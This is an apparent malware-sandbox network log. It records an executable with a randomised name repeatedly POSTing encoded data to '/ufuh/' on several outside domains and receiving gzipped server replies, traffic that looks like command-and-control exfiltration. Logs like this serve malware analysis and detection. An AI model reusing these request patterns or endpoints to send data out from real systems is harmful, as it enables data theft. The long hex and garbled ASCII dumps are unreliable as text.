4e 6c 6a 53 49 6e 7a 47 65 68 6b 59 36 37 6e 63 77 53 35 4c 39 61 4a 73 6f 65 73 68 6d 69 34 41 3d 3d Data Ascii: ZXdp=dM3KaAKz8860O8/x8Jb6TY5xuQVRtfh6XfwXH/hAFW8N6iylizvheDxkLhGczKCXYeOjFJVhWs9odpzeSRqgSi4xL5Tg7GeowUpSecLW4rtopet/dhX7/WgnUx7nJ6Ccywamt+f9HWlidCq9z6P3DuYGu7d+SDWrPbNljSInzGehkY67ncwS5L9aJsoeshmi4A==
Jun 3, 2024 08:55:12.618693113 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 03 Jun 2024 06:55:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://platinummedia.info/wp-json/>; rel="https://api.w.org/" CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a821kuDOCCK6%2FhCIL7%2BJV5M653MIEvc%2BODhvtlA%2F6wq7ZiupsJY9uufo4HCO%2B0S%2FJtkemPQ7u345JOjoCM3UA1IrWoRJ8DW93NJbf2SCw1wxeLjykmm9TmwPycFdyS62uCIBYT90gahN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88ddc6b3192a6b95-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 Data Raw: 32 33 34 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d fd 73 e3 36 92 e8 cf 2f 55 ef 7f c0 d0 b5 1e 71 86 a4 a9 2f db 23 45 de 4b e6 e3 bd 7d 95 5c b6 32 9b ba ba 9a 71 b9 20 12 92 98 a1 08 86 00 2d fb b4 fa df 5f e1 83 24 48 42 24 25 6b bc bb 77 93 54 62 11 68 34 1a 0d a0 d1 68 74 03 df bf 78 f7 cb db bf fd e7 5f df 83 15 5d 87 37 ff fb bb ef d9 5f 10 c2 68 39 33 50 64 ff f6 d1 e0 89 08 fa ec ef 1a 51 08 bc 15 4c 08 a2 33 e3 b7 bf 7d b0 af 8d 3c 3d 82 6b 34 33 ee 03 b4 89 71 42 0d e0 e1 88 a2 88 ce 8c 4d e0 d3 d5 cc 47 f7 81 87 6c fe 61 81 20 0a 68 00 43 9b 78 30 44 b3 3e c3 f2 bf c0 f7 61 10 7d 01 09 0a 67 46 9c e0 45 10 22 03 ac 12 b4 98 19 2b 4a 63 32 b9 b8 58 ae e3 a5 83 93 e5 c5 c3 22 ba e8 f7 8d 1b c0 cb d1 80 86 e8 e6 af 70 89 40 84 29 58 e0 34 f2 c1 f9 d9 f5 a0 df 9f 82 38 84 34 88 d2 35 f8 19 f9 01 fc fe 42 00 ab 44 bf 4c f0 1c 53 f2 32 27 f9 65 84 83 c8 47 0f 16 88 f0 02 87 21 de bc 04 17 37 df 29 f4 c1 90 a2 24 82 14 19 80 3e c6 68 66 c0 38 0e 03 0f d2 00 47 17 09 21 af 1f d6 a1 01 78 55 [TRUNCATED] Data Ascii: 2341}s6/Uq/#EK}\2q -_$HB$%kwTbh4htx_]7_h93PdQL3}<=k43qBMGla hCx0D>a}gFE"+Jc2X"p@)X4845BDLS2'eG!7)$>hf8G!xU3L8O)fk_,/P[^x^xI6As\|DsHoIhL$/a"X%"/<q
Jun 3, 2024 08:55:12.618729115 CEST	212	IN	Data Raw: c1 c3 d5 e0 f3 85 61 19 e8 81 1a 13 c3 89 a3 a5 61 19 e4 7e 79 1c 3e 72 bf e4 d8 c8 fd f2 bd 40 48 ee 39 42 9c 26 1e 32 26 5b c3 c3 91 07 29 2f 26 f1 73 f4 75 6e 7c be d8 c4 76 10 79 61 ea b3 ea 7e 27 3c 81 17 b4 13 14 22 48 90 b3 0e 22 e7 77 f2 Data Ascii: aa~y>r@H9B&2&[)/&sun\|vya~'<"H"w{.34vw^0^%""<=LY:z1tChFu<EhAL)e3wSp.CE_
Jun 3, 2024 08:55:12.618742943 CEST	1236	IN	Data Raw: 21 34 09 a2 65 b0 78 ec 51 d3 dc 79 90 7a 2b 56 dd 6e 97 57 1f f7 90 45 19 69 c8 f1 42 04 93 5f 91 47 7b ae e5 5a c8 f1 60 74 0f 89 23 a6 79 fe b9 42 c1 72 45 4d 0b 39 8b 20 0c ff 86 1e 68 8f 5a ae e5 9a 53 d1 00 46 e5 6f 41 44 87 83 1f 92 04 3e Data Ascii: !4exQyz+VnWEiB_G{Z`t#yBrEM9 hZSFoAD>D/+Av\|Hi%h8M1i{<~E52fd0SsAEDdh=>b1.\.H1K`_'/hT~j@/>\|~N}J=P~H
Jun 3, 2024 08:55:12.618757010 CEST	1236	IN	Data Raw: 10 05 70 d4 04 a8 40 f6 9d 6b 05 d2 47 f6 3c c4 de 17 9b 8d d1 65 c2 ec 03 93 b3 f7 6f df 7f f8 30 cc 61 f8 e6 d6 0e a2 38 a5 a4 04 f7 e1 cd 87 1f 3e fc 28 e1 22 9c ac 61 a8 54 ce 37 00 93 fe c0 75 e3 87 0c 06 26 09 de d4 60 ae c6 05 c8 3c c4 4b Data Ascii: p@kG<eo0a8>("aT7u&`<Komo\LjYgMn=dr(mdQb{)i.79yJ),ybLNPI\fdGBM~>%FX2C~yx\#b
Jun 3, 2024 08:55:12.618768930 CEST	1236	IN	Data Raw: bd 72 63 9b 06 ac e6 4d e0 2f 11 cd 6c 02 e2 0b 38 9b 58 9a c5 18 51 41 b4 54 77 17 83 ca ee 42 ee d8 db ab e2 83 47 6c c8 c5 7e b3 ac fa 4a cb 51 66 6f cb 93 8b 25 28 cb 42 7e 40 ed 04 c5 e1 a3 cd a5 14 34 b7 4c 99 b3 7d e4 e1 84 8b 9b 09 3b 6c Data Ascii: rcM/l8XQATwBGl~JQfo%(B~@4L};lIXkEcXmD;)\mbn{li?k!r.Iw.X&:xG{`<4{b"cB.l=+ndXH4ua%fkATl
Jun 3, 2024 08:55:12.618866920 CEST	636	IN	Data Raw: ad c9 04 9c fc 64 31 49 d3 9d e0 30 5b 81 95 f9 c2 c7 39 97 20 84 12 65 86 95 e6 89 db 3e e4 7d 44 be 50 1c 67 36 92 bc 05 c2 79 8e a1 cb 89 2b ac 8d 7a cf ba ac e3 26 c0 cd 28 af 6f 34 b4 ea bd 6e df 51 df 71 ec d9 6b 68 f7 12 cd 87 c3 14 85 a5 Data Ascii: d1I0[9 e>}DPg6y+z&(o4nQqkhoRt[u;MIljn#w7Q!GP#*~NsZc7#>22fPf'd-w_q/,8\|15?f02C8G
Jun 3, 2024 08:55:12.618937016 CEST	1236	IN	Data Raw: af 29 aa db fc 74 b4 12 ac cd d9 a2 da 61 37 7b 54 9a 3d 1e 0f 87 ca 40 a9 df be 79 f3 e6 4d c9 cc 56 55 07 ff 55 45 7d 49 e2 0e 6a 12 77 70 ad 91 b8 83 aa c4 e5 50 3b 0d 73 c6 a3 d1 7f 1b e6 b8 75 e6 8c 34 cc 71 6b cc e1 fb b0 5d 79 1c 7f 92 41 Data Ascii: )ta7{T=@yMVUUE}IjwpP;su4qk]yA`bEL2<R_rm6iZuaqI0SjpTQFGUR5Qyq/eW53tE$`0]GS,_WRBvBsP.k
Jun 3, 2024 08:55:12.618948936 CEST	1236	IN	Data Raw: e3 16 68 18 cf c3 1e c5 85 04 3c d6 51 04 75 6b 92 f4 31 aa 79 90 64 36 54 49 7e c1 03 f7 9d ca 2e b1 30 d5 fb 76 22 76 b1 39 e2 17 20 c4 41 b4 34 bf 32 41 30 a7 a2 6b 1f 31 d6 de c3 24 10 97 78 14 31 a9 11 42 3e f2 b5 ac 2d 7a c3 c3 eb 18 47 fc Data Ascii: h<Quk1yd6TI~.0v"v9 A42A0k1$x1B>-zGkyz:z{uzJi94+Dc\KvZ@Y0&jJY{gPTf{}89G4w^:2<vimkI'Y%+Y*Vy-l`yxdg2A=d
Jun 3, 2024 08:55:12.618961096 CEST	1236	IN	Data Raw: f6 65 e5 8b 0b 95 6d a0 a9 cd 12 3b 47 33 db 40 4b ee 8f f3 57 46 35 15 b6 ee 31 ad e2 a7 1e 78 ab 7a bc 1e 56 5b 6d 23 da 50 19 87 3d a0 61 c5 5c e0 56 3d b8 64 9b 73 6b cf bb 90 4e 82 a0 6f af f9 16 58 7d 91 80 bb be ee 34 af 11 c6 80 5f 12 ae Data Ascii: em;G3@KWF51xzV[m#P=a\V=dskNoX}4_XD2KVfO$(LqV~d"(N-<I6G<{.&eE!S''{kg^X}+ScJwc?y!$[ZG+~[ORQWgtg#=
Jun 3, 2024 08:55:12.618973017 CEST	314	IN	Data Raw: 9e f2 fa 13 80 ed f0 cd 61 c9 99 31 86 3f 0f 54 32 b0 e8 b3 29 8b c2 a6 f6 d0 e6 47 e6 09 de 00 2d 5c fd 2c fe 49 95 b1 4e 6b ae ab b0 e4 6d e5 4b 47 dc ca d7 07 17 c0 ee b7 86 06 1f 4a 98 8c 9f 7e 1e 2e e4 95 3d 9d 0b a5 92 f2 8d 19 79 e7 f6 27 Data Ascii: a1?T2)G-\,INkmKGJ~.=y'Rh'f^wD86zP:8U-5k.!2FF+V"*7[xqSQ9\p$A /Mqe_h=RIy0GE\|q7jC/m~uVCo
Jun 3, 2024 08:55:12.623646975 CEST	1236	IN	Data Raw: 38 37 31 0d 0a ec 5d db 6e e3 38 0c 7d ce 7c 85 b7 c5 02 33 8b d8 70 db 99 76 db 02 f3 1d 8b 05 e6 c1 49 9c d6 3b 4e 1c d8 49 2f 13 f4 df 17 a4 28 9b b2 2e be 67 8b 45 91 17 47 b6 48 dd 25 52 e4 21 9f 15 4a 37 36 61 fb b7 d9 41 f4 89 53 3e f9 20 Data Ascii: 871]n8}\|3pvI;NI/(.gEGH%R!J76aAS> [ehANd,Fl4:a[w?w@:#QE;"NgeX)&Xp7AuGLG;*;Q7w&mo:#WM9]OV8%G}Q"\

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.22	49206	172.67.182.131	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:55:13.852524996 CEST	2472	OUT	POST /ufuh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 3625 Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Host: www.platinummedia.info Origin: http://www.platinummedia.info Referer: http://www.platinummedia.info/ufuh/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 5a 58 64 70 3d 64 4d 33 4b 61 41 4b 7a 38 38 36 30 50 64 50 78 76 59 62 36 56 34 35 32 77 41 56 52 2f 66 68 2b 58 66 38 58 48 37 34 66 47 6b 51 4e 36 78 61 6c 6a 51 58 68 54 6a 78 6b 4e 68 47 59 39 71 43 42 59 65 4b 4a 46 4d 70 58 57 71 6c 6f 66 4f 58 65 62 7a 43 76 4b 69 35 58 41 5a 54 6a 37 47 65 48 77 58 52 57 65 63 2f 77 34 72 31 6f 70 49 35 2f 62 52 58 34 31 32 67 6e 55 78 37 72 4a 36 43 77 79 77 7a 6a 74 37 7a 74 48 6e 56 69 64 6a 4b 39 31 62 50 34 55 65 59 43 67 62 63 55 5a 53 37 6c 48 4b 52 6c 71 44 73 6e 35 45 57 56 73 65 75 33 70 38 77 66 36 75 68 33 44 6f 46 61 6b 69 72 61 6c 70 53 56 33 67 7a 78 66 6c 59 2b 6e 50 73 52 35 54 52 68 6e 59 62 46 54 2f 74 6a 4a 5a 44 73 6d 49 43 43 62 6e 62 69 34 47 4b 43 4e 53 47 6f 51 63 71 41 31 6c 77 62 2b 6e 45 4e 50 42 34 55 78 77 75 6a 48 37 45 6f 48 48 52 71 61 65 52 69 4a 5a 39 72 4e 58 79 7a 6a 47 38 41 64 7a 59 58 75 6b 4d 42 6c 50 4c 72 49 33 47 4c 42 48 63 6e 74 6f 43 58 65 53 46 41 4c 54 70 72 36 4b 54 48 78 75 4e 79 45 62 6e 31 47 4e 38 72 7a [TRUNCATED] Data Ascii: ZXdp=dM3KaAKz8860PdPxvYb6V452wAVR/fh+Xf8XH74fGkQN6xaljQXhTjxkNhGY9qCBYeKJFMpXWqlofOXebzCvKi5XAZTj7GeHwXRWec/w4r1opI5/bRX412gnUx7rJ6Cwywzjt7ztHnVidjK91bP4UeYCgbcUZS7lHKRlqDsn5EWVseu3p8wf6uh3DoFakiralpSV3gzxflY+nPsR5TRhnYbFT/tjJZDsmICCbnbi4GKCNSGoQcqA1lwb+nENPB4UxwujH7EoHHRqaeRiJZ9rNXyzjG8AdzYXukMBlPLrI3GLBHcntoCXeSFALTpr6KTHxuNyEbn1GN8rzUxim8UB9qtlSuqjtgZVIbBzuJfWhcVPkQx2wtDODhC843p7na8LpC7V4JLwjJ3EWNiwyAalAmAWZjhA7ztl+3R9VVgvI3fMltZOVfPI9KnhC2CltEOqR++E6dnr7aUdQes/ktAtmpKR42MJ5Qh9IruoL4cwJC4T63ZqOYnU8nOKTLJ71acwJ5LGLvG0UC4Msba+Bs1cZQWbkJnp3Yrg2B4aFqxg01RjcZUJiIekQ1yA6iEN8d70GIrnX29oWFJXreu/V0kJ4du/NW3L0hcAn1pWfsaB+9ypcDUOojG/YQT1lTK/xmT7R43vbdloMZXfP5a88ZwYZmkr0Ubox0LgAUyqb1H5sVnJgvRQ1rkK2yihd/iOTjEARbLMee9YnvUykj5RjbzMTAN7lfGDgZPt0jDNtltw/mlEg/NzGscs6xCWBqcMZSwbviCqdypDLMKo5DgsKaNNCmWwTHZI50ZkB+D8OrrtGW3Z1zeWpguM1ldwNV9yAfUfnB+xP8yScZ9vL+qZqvWgVyAPy0g0zcYScMLmZtiMPWsGGIqpAuMphKKm4IRGDkf6qJpS8hO5F/r28Ui5Cc1gaQFDVvSoLIQG6BR9b5qrMJHH8gvGlHye7dSFyBSqfjHdLEoLk8AxrIgyJU02YUnG7qTTpEaVWR0dspa6838rDy2TyxR [TRUNCATED]
Jun 3, 2024 08:55:13.857470036 CEST	1693	OUT	Data Raw: 69 54 2f 41 32 4d 73 58 33 6e 72 6e 48 50 72 75 56 64 62 6d 68 70 31 54 33 78 2f 74 6f 47 67 72 63 72 4c 69 38 59 41 41 30 39 78 6e 50 75 70 6a 50 4c 6f 55 30 56 37 6a 37 56 32 43 4d 4d 67 61 38 77 39 43 56 6b 48 6e 45 38 4a 2b 33 66 65 62 53 31 Data Ascii: iT/A2MsX3nrnHPruVdbmhp1T3x/toGgrcrLi8YAA09xnPupjPLoU0V7j7V2CMMga8w9CVkHnE8J+3febS1m65naXjGrVyRTFBLYw6IYxVa/ExFyOOLHAZ4Ts5oI72aygDOzPmNr8tkDPkJFzDft/NuUkoVkJcCbv7UtbdVjQBbPvbJoHz+xLg/r7JgYlGINnMd14Q1r0/KFO7BIRmMMvSOuP/Pr6BYiF4g4BmXbTFW8IMteUiVR
Jun 3, 2024 08:55:14.864710093 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 03 Jun 2024 06:55:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://platinummedia.info/wp-json/>; rel="https://api.w.org/" CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rPhcznM%2Fge%2BkD%2BoXrylZ2XUG81kql9N7ig4D%2FBTb0QNCb8abwaxA1ffidOfVaG1kX5R%2Bh5idcWzBa%2Bit21F3SXoI4IjqTaxpImgtlaC98XllTYApx%2BpDPqGYZnNU8vTG%2Bt6DDGxKzDKi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88ddc6c2ed776994-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 Data Raw: 31 32 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 3b fd 8f db b6 92 3f 5f 80 fb 1f b8 5a bc 8d d4 48 b2 ec fd 48 62 c7 db 4b 93 ec 5d 0f cd 4b d1 34 38 1c b2 8b 05 2d 8d 64 26 14 a9 92 94 ed 7d ae ff f7 03 49 c9 96 6c 79 ed b4 7d 38 bc 00 c1 52 c3 e1 70 38 9c 4f 92 7e 75 f2 f6 c3 9b 5f ff f7 e7 77 68 aa 72 7a fd ef 4f 5e e9 bf 88 62 96 8d 1d 60 c1 a7 8f 8e 01 02 4e f4 df 1c 14 46 f1 14 0b 09 6a ec 7c fa f5 26 78 e1 ac e1 0c e7 30 76 66 04 e6 05 17 ca 41 31 67 0a 98 1a 3b 73 92 a8 e9 38 81 19 89 21 30 1f 3e 22 8c 28 82 69 20 63 4c 61 dc d7 54 fe 0d bd a2 84 7d 45 02 e8 d8 29 04 4f 09 05 07 4d 05 a4 63 67 aa 54 21 87 bd 5e 96 17 59 c8 45 d6 5b a4 ac d7 ef 3b d7 c8 8c 53 44 51 b8 fe 19 67 80 18 57 28 e5 25 4b d0 d9 e9 8b 41 bf 3f 42 05 c5 8a b0 32 47 ef 21 21 f8 55 cf 22 37 99 7e 2a f8 84 2b f9 74 cd f2 53 c6 09 4b 60 e1 23 c6 53 4e 29 9f 3f 45 bd eb 27 0d fe 30 55 20 18 56 e0 20 f5 50 c0 d8 c1 45 41 49 8c 15 e1 ac 27 a4 7c b6 c8 a9 83 cc 54 63 a7 cd 01 3a 13 f8 b7 92 8f d0 0d 40 b2 bd c0 1a 35 d7 98 [TRUNCATED] Data Ascii: 1283;?_ZHHbK]K48-d&}Ily}8Rp8O~u_whrzO^b`NFj\|&x0vfA1g;s8!0>"(i cLaT}E)OMcgT!^YE[;SDQgW(%KA?B2G!!U"7~*+tSK`#SN)?E'0U V PEAI'\|Tc:@5!a)I'90%e$XB]?yx?/ _GPL1Z:,"~pGr\m/(<=,n{B9C',Xe
Jun 3, 2024 08:55:14.864775896 CEST	212	IN	Data Raw: 9e 9c 65 86 9a 9c 65 ef 2c 41 39 33 04 79 29 62 70 86 4b 27 e6 2c c6 ca 0c ab e8 1b f2 bb d2 b8 ed cd 8b 80 b0 98 96 89 9e ee 8b 34 00 33 30 10 40 01 4b 08 73 c2 c2 2f f2 fb 19 88 f1 55 78 19 9e 3b ab d5 e8 49 ef bb 13 f4 eb 94 48 a4 f5 1b 11 89 Data Ascii: ee,A93y)bpK',430@Ks/Ux;IHpx$dI[@>j8]J<>5^F+H%+T8/.9zx>IpQq3%.R2>V1VTOZ/\f@
Jun 3, 2024 08:55:14.864814997 CEST	1236	IN	Data Raw: dc c8 8f 7c 08 63 cc 66 58 86 d6 cc d7 9f 53 20 d9 54 79 3e 84 29 a1 f4 57 58 28 57 f9 91 1f 79 23 bb 00 cd e5 27 c2 d4 f9 e0 b5 10 f8 c1 85 30 03 f5 a3 de ca b7 58 e1 63 48 87 09 56 d8 f3 c5 d8 fd 13 3c 31 c3 93 ff 57 71 e3 8d 04 a8 52 30 a4 42 Data Ascii: \|cfXS Ty>)WX(Wy#'0XcHV<1WqR0BxpU'cYZrN'8s@M-mmB(Jn~n!^I?<iMRh;]H;;;L&mWA}hC7\o oA;<u7=h4h'
Jun 3, 2024 08:55:14.864850998 CEST	1236	IN	Data Raw: 85 e0 f3 1d 9c e7 97 1b 94 09 e5 59 60 ca f3 40 e7 47 c1 dc d4 0d c3 ab 28 6a 22 e8 23 8a 66 d7 4a 9f ce 2c cd 00 49 fe 01 c3 7e 14 fd 6d b4 c2 cb 98 53 2e 86 33 2c 5c 3b 38 33 c9 5f 60 c0 41 e4 8d 56 78 38 e5 33 10 3e 1e a6 3c 2e e5 e3 03 fa de Data Ascii: Y`@G(j"#fJ,I~mS.3,\;83_`AVx83><.h5?)7"%Ppi1L;.yL8'aT?h#\|3>C,?MJJfz^J:Eb%3H$5%yEES@>2d$F.!"[<.so
Jun 3, 2024 08:55:14.864885092 CEST	1236	IN	Data Raw: f3 da e3 00 2e aa a0 66 a8 14 5a 67 b6 7b fc 43 4c 87 25 ce 26 81 c2 93 9a fd 83 b8 24 9d 04 b1 0e ad c7 e0 4f 26 41 ce 93 92 c2 b6 94 0e 4e 63 fc 6f 26 48 72 f4 08 7d f5 a6 25 76 fc 00 1e df db 30 71 f4 08 bc e0 39 67 0f c1 84 2f 8e 19 34 e7 dc Data Ascii: .fZg{CL%&$O&ANco&Hr}%v0q9g/4;jR@`.E(xqJl<K~MU aj4#n0T!YB#pMBB8)p;Y;P(f[aTQ:vYn}$o;joEM~c
Jun 3, 2024 08:55:14.864923000 CEST	376	IN	Data Raw: 4f eb ba 1f 4d 98 d8 64 cb b4 9d 87 6e cd eb 47 f3 dc a4 11 12 d6 0f 22 f5 11 75 bf f1 22 a7 72 50 17 06 b2 be db 8d 34 56 b1 40 1a 5b b7 45 36 b1 bf 78 8a fc 28 8c 2e bd 9d 03 60 93 4e 6c 12 1c ff f4 e2 f9 e5 e5 d5 cb ad 2b f4 7f 91 3d 58 4e 6b Data Ascii: OMdnG"u"rP4V@[E6x(.`Nl+=XNkje+oik;s'Vka+{+o;Z#g,TPB>/Got+m:92vn~WD-hKs.zW_FZ
Jun 3, 2024 08:55:14.865556955 CEST	1236	IN	Data Raw: 31 38 61 31 0d 0a ec 5d 5b 6f e3 38 96 7e ae fe 15 9c 04 0d 94 ab 2d ad af b9 38 98 02 66 b7 d1 4f fb 36 2f 8b a9 29 14 14 5b 49 b4 2d 5b 86 64 27 a9 31 f2 df 17 3c bc 93 47 14 25 cb ee da 9e a0 80 6e 47 22 0f 0f 0f 29 5e ce e5 3b 6c 99 1a 62 24 Data Ascii: 18a1][o8~-8fO6/)[I-[d'1<G%nG")^;lb$NC(7B'mU_8V"g7+0kWsMhx$fX07WSnS6,B.`&FKMYni0^]qZ%N69{>2ewSV'}_
Jun 3, 2024 08:55:14.865659952 CEST	212	IN	Data Raw: 90 ce a4 81 ce bc 27 3a 57 a1 74 e6 2d 66 9b 13 c4 46 ea 62 6e 87 56 04 01 24 2e c0 c3 aa 4f b0 a8 9b 13 3c c4 a9 c1 5e 82 fc 5f 67 8f 67 d1 f0 50 f4 86 91 09 a6 13 36 72 be 80 f8 ba 81 c4 0d b4 c1 06 d6 b3 4e ba f3 1c 44 7f 98 1e 1e 7b 46 d3 e2 Data Ascii: ':Wt-fFbnV$.O<^_ggP6rND{FBj(fUzvEbN/@Pc_Dy5@&4@R&bH4~^y# Z7v6NrXeX"~\|(,<T*(<2r>-0
Jun 3, 2024 08:55:14.865696907 CEST	1236	IN	Data Raw: 5b 7d fb b6 2d 8b d5 7e 49 67 26 fe a2 fe cb 47 8b 47 c5 a6 4a f2 74 a8 26 31 2f 76 f1 95 20 82 87 b0 47 06 48 00 b1 8e 2c a8 1b 79 84 c7 a8 ca 20 49 31 55 2b 09 f0 00 be 53 02 c4 62 a0 e3 ed 6c 28 b0 79 0a 00 08 db 6c f3 38 38 31 43 89 e4 22 74 Data Ascii: [}-~Ig&GGJt&1/v GH,y I1U+Sbl(yl881C"th2c *&utVXo{kNO7NGa>1 CWXo\V0'"+V\|jA4p>V5J=ilZ0#ga
Jun 3, 2024 08:55:14.865762949 CEST	1236	IN	Data Raw: 99 c0 85 da 35 70 80 be 62 37 c7 81 b8 40 73 e9 cf 65 96 51 a4 c1 c6 3b e6 50 fd c4 0b 1f 74 8f d7 76 ad 39 17 51 4f 63 50 b6 45 c7 d4 b7 00 5a bd e4 91 5e ce 87 35 79 21 e3 32 4d 56 d1 1a ae c0 7a 46 02 70 7d 7d 43 b2 11 6e 09 80 84 6b 1a 11 a1 Data Ascii: 5pb7@seQ;Ptv9QOcPEZ^5y!2MVzFp}}Cnk)D2])@kff3S!3vhnBs~}-2 0Ok),i{ich#m2O_/l]]7x@tQptmX\

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.22	49207	172.67.182.131	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:55:16.387996912 CEST	467	OUT	GET /ufuh/?ZXdp=QOfqZ3C365rWM5PNnqKgcYVw/D14oMJ0U94Qap1ZDEZ76SuXpRuIURFJIFOuyM+4ZYaYHsoNTZRkaIPARhaxfi59ArfSwjebkEhnFs3MoqVX/bchVRHPl2c5fWqR&7jsp7=zz9xHbtX HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.platinummedia.info User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Jun 3, 2024 08:55:17.323388100 CEST	909	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 03 Jun 2024 06:55:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: http://platinummedia.info/ufuh/?ZXdp=QOfqZ3C365rWM5PNnqKgcYVw/D14oMJ0U94Qap1ZDEZ76SuXpRuIURFJIFOuyM+4ZYaYHsoNTZRkaIPARhaxfi59ArfSwjebkEhnFs3MoqVX/bchVRHPl2c5fWqR&7jsp7=zz9xHbtX CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QUNbhKJQg2uYdizsoithPM%2FTUTGsJYlKQbX%2FS%2BGR8sjWvBNLmcH0h7u0QpUoLeiv1JKShuzvkoW52zlcjZA607FgQbedC85xIcGdS5oH3dFetEmMB%2BginXAwvc9NVs3g74VQ7zt3GzPv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88ddc6d2ce6647ac-DFW alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.22	49208	93.127.187.187	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:55:22.410810947 CEST	2472	OUT	POST /ufuh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 2161 Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Host: www.elenagilherrero.com Origin: http://www.elenagilherrero.com Referer: http://www.elenagilherrero.com/ufuh/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 5a 58 64 70 3d 4e 44 51 38 75 6d 4d 4a 33 49 2f 2b 6c 6d 68 49 43 7a 56 79 59 67 52 47 63 38 45 45 5a 42 57 47 64 73 37 43 48 71 4d 68 72 4d 33 51 42 51 70 4c 46 59 6e 48 4b 6d 4d 5a 55 4f 49 2b 50 41 51 36 77 4c 71 52 4b 54 31 52 42 54 6c 6c 7a 30 33 39 4b 61 75 4c 4c 74 50 39 37 46 6b 52 71 54 48 49 78 4c 7a 71 53 4b 43 75 78 4f 68 44 2f 70 49 69 52 6e 75 71 4d 50 7a 6d 56 4a 42 59 68 6c 50 42 76 50 64 5a 77 75 63 66 53 6d 76 45 30 70 39 56 68 51 5a 70 30 48 64 39 54 48 74 55 6f 36 2b 4f 4b 2b 46 44 4a 7a 55 36 4a 37 5a 66 4a 52 38 30 37 4b 2f 31 71 53 71 55 6f 62 56 68 44 37 77 71 52 57 34 73 61 46 30 37 70 38 79 6f 5a 38 48 68 51 58 6d 38 39 41 35 42 58 48 57 2f 4a 4e 34 73 34 4d 44 6e 56 35 45 39 75 61 76 75 55 62 4e 47 6d 67 42 69 4e 6a 6a 2f 46 37 73 36 49 49 30 51 71 5a 6a 75 4f 6c 64 4e 72 32 44 4a 6b 56 4a 44 75 79 61 45 66 53 4a 31 2b 58 31 4e 6d 6a 70 34 67 39 70 6e 61 38 4a 53 4b 33 6f 4a 5a 46 65 2f 63 65 75 46 53 56 77 73 33 42 4d 78 32 43 36 33 6c 47 52 2f 63 44 70 6d 49 46 38 46 47 [TRUNCATED] Data Ascii: 